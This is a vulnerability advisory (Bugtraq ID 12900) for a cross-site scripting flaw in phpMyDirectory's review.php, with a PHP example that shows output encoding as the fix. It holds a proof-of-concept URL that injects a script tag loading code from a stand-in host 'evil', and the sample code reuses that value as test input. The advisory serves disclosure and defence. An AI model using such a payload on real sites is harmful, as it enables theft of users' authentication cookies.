PHPMyDirectory Review.PHP Multiple Parameter Cross-Site Scripting Vulnerability
BID:12900
Info
| Bugtraq ID: | 12900 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 25 2005 12:00AM |
| Updated: | Mar 25 2005 12:00AM |
| Credit: | Discovery is credited to mircia mircia <[email protected]>. |
| Vulnerable: | phpMyDirectory phpMyDirectory 10.1.3-rel |
| Not Vulnerable: | |
Discussion
phpMyDirectory is prone to a cross-site scripting vulnerability.
The problem presents itself when malicious HTML and script code is sent to the application through various parameters of the 'review.php' script.
This issue may allow for theft of cookie-based authentication credentials or other attacks.
phpMyDirectory 10.1.3-rel is reported vulnerable; other versions may be affected as well.
Exploit / POC
An exploit is not required.
The following proof of concept example is available:
http://www.example.com/review.php?id=1&cat=&subcat="><script src=http://evil/foo.js></script>
Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
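The defect class described in the discussion is closed by encoding request parameters for their output context. The PHP below is an added example, not phpMyDirectory code: it assumes (the page does not show the source) that 'review.php' echoes `subcat` into a double-quoted HTML attribute, which is consistent with the `">` prefix in the proof of concept, and the function names and form markup are hypothetical.

```php
<?php
// Added illustration; NOT phpMyDirectory source. The markup below is an
// assumed stand-in for how review.php might echo its parameters.

// Constructed input: the parameter values from the proof of concept URL.
$params = [
    'id'     => '1',
    'cat'    => '',
    'subcat' => '"><script src=http://evil/foo.js></script>',
];

// Vulnerable pattern: request data concatenated straight into an attribute.
// The leading "> in the value closes the attribute and the tag.
function render_unsafe(array $p): string
{
    return '<input type="hidden" name="subcat" value="' . $p['subcat'] . '">';
}

// Encode for the HTML attribute context at the point of output.
// ENT_QUOTES covers both quote styles; ENT_SUBSTITUTE replaces invalid UTF-8.
function attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hardened pattern: validate what should be numeric, encode everything else.
function render_safe(array $p): string
{
    // Hypothetical rule: id must be a positive integer; reject anything else.
    $id = filter_var($p['id'], FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return '<p>Invalid listing.</p>';
    }
    return '<input type="hidden" name="id" value="' . $id . '">'
         . '<input type="hidden" name="cat" value="' . attr($p['cat']) . '">'
         . '<input type="hidden" name="subcat" value="' . attr($p['subcat']) . '">';
}

$unsafe = render_unsafe($params);
$safe   = render_safe($params);

// Report whether each rendering still contains a live <script> element.
var_dump(strpos($unsafe, '<script') !== false);
var_dump(strpos($safe, '<script') !== false);
echo $safe, PHP_EOL;
```

Because the advisory names several affected parameters, the encoding helper has to be applied at every place a request value is written into the page, not only to `subcat`.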
References
References:
- phpMyDirectory Homepage (phpMyDirectory)
- phpMyDirectory 10.1.3-rel Cross site scripting (mircia mircia)